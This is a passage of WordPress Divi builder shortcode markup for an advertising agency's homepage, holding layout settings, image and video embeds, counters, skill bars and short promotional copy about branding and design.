header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||92px|||\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" custom_margin=\"40px||59px|||\" custom_margin_tablet=\"||0px||false|false\" custom_margin_phone=\"3px||0px||false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"30px||0px||false|false\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" padding_1_tablet=\"\" padding_1_phone=\"0px|||10%|false|false\" padding_1_last_edited=\"on|phone\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_margin_tablet=\"\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"4.5.2\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_margin_tablet=\"|||40px|false|false\" custom_margin_phone=\"|||30px|false|false\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|0px||||\"][et_pb_column_inner 